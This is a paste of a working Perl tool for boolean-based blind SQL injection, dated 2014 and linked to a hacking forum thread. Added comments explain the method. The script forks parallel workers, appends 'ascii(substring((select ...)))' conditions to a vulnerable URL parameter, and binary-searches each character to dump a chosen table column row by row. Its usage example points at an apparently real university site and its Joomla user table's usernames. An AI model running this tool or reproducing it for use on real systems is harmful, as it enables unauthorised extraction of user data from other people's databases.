causevd

Blind SQLi

Sep 8th, 2014
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3. use HTML::Parse;
  4. use HTML::FormatText;
  5. use Getopt::Long qw(:config no_ignore_case bundling);
  6.  
# Blind sql injection.
#
# Boolean-based blind SQL injection dumper. It reads one column ($opt_C) of
# one table ($opt_T) from a web application whose request parameter $opt_p
# is concatenated into a SQL statement, one character per probe batch. Each
# probe is a plain GET of $url with the fragment
# " and ascii(substring((select ... limit N,1),POS,1))>=MID" appended;
# sub1() decides true/false by comparing the rendered response with the
# unmodified page ($orig_page). Roughly seven probes resolve one character
# (binary search over codes 31..123), so a dump appears in web-server or
# WAF logs as a burst of near-identical requests whose query strings all
# contain that literal fragment. The application-side fix is to stop
# interpolating the parameter into SQL (parameterised queries). agent() is
# never called on the LWP::UserAgent objects, so the requests go out with
# LWP's default User-Agent string.

# COMMANDLINE.
# Every option lands in a package global (the file does not use strict);
# sub1() reads $url, $type, $opt_p, $opt_T, $opt_C and $sql_limit directly
# rather than receiving them as arguments.
GetOptions( 'h=s'=>\$url,'type=s'=>\$type,'p=s'=>\$opt_p,'T=s'=>\$opt_T,'C=s'=>\$opt_C,'threads=i'=>\$threads,'rows=i'=>\$rows );

# Mandatory switches: --type, -p, -h, -T and -C. usage() prints the synopsis
# and the script exits.
if ($type ne 'char' && $type ne 'int') { print "\nYou must enter --type: char or int"; &usage; exit; };
if (!$opt_p) { print "\nYou must enter the vulnerable paramater."; &usage; exit; };
if (!$url || !$opt_T | !$opt_C) { &usage; exit; };

$threads=5 if (!$threads); # default threads (fork()ed children per batch, not Perl threads)
$rows=100 if (!$rows); # default rows to get

$start = localtime();

# Baseline: fetch $url once without any injection and render it to text.
# sub1() compares every probe response against this copy, so the whole
# technique depends on the page being byte-stable between requests.
my $ua=new LWP::UserAgent;
$ua->timeout(30);
my $content=$ua->get($url);
my $orig_page=HTML::FormatText->new->format(parse_html($content->content));

print "Started $start\n";

# Outer loop: one iteration per row; $sql_limit is the offset used in the
# "limit $sql_limit,1" clause built inside sub1().
for ($sql_limit=0; $sql_limit<$rows; $sql_limit++)
{
    # Character positions of this row still to be resolved (1-based, up to 1000).
    @waitlist = (1..1000);
    $end_of_string=0;
    my @word;

    while (@waitlist) {
        # Take the next $threads positions off the wait list for this batch.
        for ($count = 0; $count<$threads; $count++) {$current_batch[$count]=shift(@waitlist);}

        # One child per position. pipe() opens a read end in a glob named after
        # the position (symbolic reference *{$letter}) and a write end in the
        # bareword handle RETHAND; the child inherits both, runs sub1() for the
        # global $letter and exits.
        foreach $letter (@current_batch) {
            pipe *{$letter},RETHAND;
            unless ($pid = fork()) {
                sub1();
                exit();
            }
        }

        # wait for returned data
        # Parent side: read one line (the resolved character code) from each
        # child's pipe, in batch order, and echo position/character to the tty.
        autoflush STDOUT 1;
        foreach $letter (@current_batch) {
            $response = <$letter>;
            # 31 is sub1()'s initial $lower; it comes back when no probe in the
            # search matched, which the main loop treats as "past the end of the
            # value".
            $end_of_string=1 if ($response==31);
            $word[$letter]=chr($response);
            printf "\r%3d %1s",$letter,chr($response);
        }
        last if ($end_of_string==1); # end of string - exit loop
    }
    # Print the recovered row ($word[0] is never assigned, positions start at 1).
    print "\n\n";
    foreach (@word) {
        print "$_";
    }
    print "\n\n";
    # An empty first character means the "limit $sql_limit,1" row did not exist.
    last if (ord($word[1])==31); # no more rows - exit loop
} # increase row / limit
$end = localtime();
print "\n\nCompleted $end\n";
  66.  
  67.  
  68.  
# Child-side worker. Binary-searches the ASCII code of character position
# $letter of row $sql_limit of "select $opt_C from $opt_T" and writes the
# result, followed by a newline, to RETHAND - the write end of the pipe the
# parent created for this position immediately before fork().
#
# Takes no arguments. Reads the package globals $letter, $sql_limit, $url,
# $opt_p, $opt_T, $opt_C and $type, and the file-scoped lexicals $ua,
# $content and $orig_page declared in the main script.
sub sub1 {
    # $letter is undef when the batch ran past the end of @waitlist; such a
    # child writes nothing and simply exits.
    if (defined $letter) {
        # Search interval for the character code. 31 is returned unchanged
        # when every probe is answered "false", so the parent reads 31 as
        # "no character at this position".
        my ($lower,$upper)=(31,123);
        while ($upper-$lower>1) {
            # Midpoint of the interval, rounded half up.
            my $diff=($upper-$lower)/2;
            $diff=int($diff + .5);
            $diff+=$lower;
            # A fresh agent per probe; agent() is never set (default User-Agent).
            $ua=new LWP::UserAgent;
            $ua->timeout(15);
            # Split $url around the injected parameter: $1 is everything up to
            # and including "$opt_p=<value>", $2 the remaining "&..." tail. The
            # pattern only matches when another parameter follows $opt_p; when
            # it does not, $1 is undefined here and the else branch appends to
            # the whole URL instead. $opt_p is interpolated into the pattern
            # without quotemeta.
            $url=~m/(.+[&|\?]$opt_p=.+?)(&.+)/i;
            if ($1) {
                # Probe: "is ascii(char at $letter) >= $diff?". The two --type
                # variants differ only in quoting - 'int' appends directly, 'char'
                # closes the string value first and re-balances with "and 1='1'".
                if ($type eq 'int') {
                    $content=$ua->get($1 . ' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . $2);
                } else {
                    $content=$ua->get($1 . '\' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . ' and 1=\'1' . $2);
                }
            } else {
                if ($type eq 'int') {
                    $content=$ua->get($url . ' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff);
                } else {
                    $content=$ua->get($url . '\' and ascii(substring((select ' . $opt_C . ' from ' . $opt_T . ' limit ' . $sql_limit . ',1),' . $letter . ',1))>=' . $diff . ' and 1=\'1');
                }
            }
            # Render the response the same way the baseline was rendered and
            # compare. Identical page => the appended condition held => the code
            # is >= $diff, so the interval moves up; any difference moves it down.
            # The trailing bare "1" is a no-op expression statement.
            $content=HTML::FormatText->new->format(parse_html($content->content));
            # Leftover alternative oracle: look for a fixed marker string instead
            # of diffing the whole rendered page.
            #($content!~m/A4583SL/)?$upper=$diff:$lower=$diff;
            ($content ne $orig_page)?$upper=$diff:$lower=$diff;1

        }
        # Hand the resolved code (or the 31 sentinel) back to the parent.
        print RETHAND "$lower\n";

    }
}
  101.  
# Print the command-line synopsis to STDOUT. Called from the argument checks
# in the main script, which exit right after it returns; prints nothing else
# and returns nothing meaningful.
sub usage
{
    print "\n";
    print "\nUSAGE : $0 [-h URL] [-p vuln p.] [--type int|char] [-T table name] [-C column name]\n";
    print "\n-h = Host address.";
    print "\n-p = Vulnerable parameter.";
    print "\n--type = vulnerable parameter type; int or char.";
    print "\n-T = Table name.";
    print "\n-C = Column name.";
    print "\n--threads = [optional] number of threads, default is 5";
    print "\n--rows = [optional] number of rows to dump, default is 100";
    print "\n\nEg usage: perl $0 -h \"http://www.cs.teiher.gr/index.php?option=com_juser&task=show_bio&id=88&lang=en\" -T jos_users -C username --type int -p id";
    print "\n\n\n";
}
  116.  
  117. Read more: http://www.ubers.org/Thread-PERL-Blind-SQLi#ixzz3Cm0YlqHk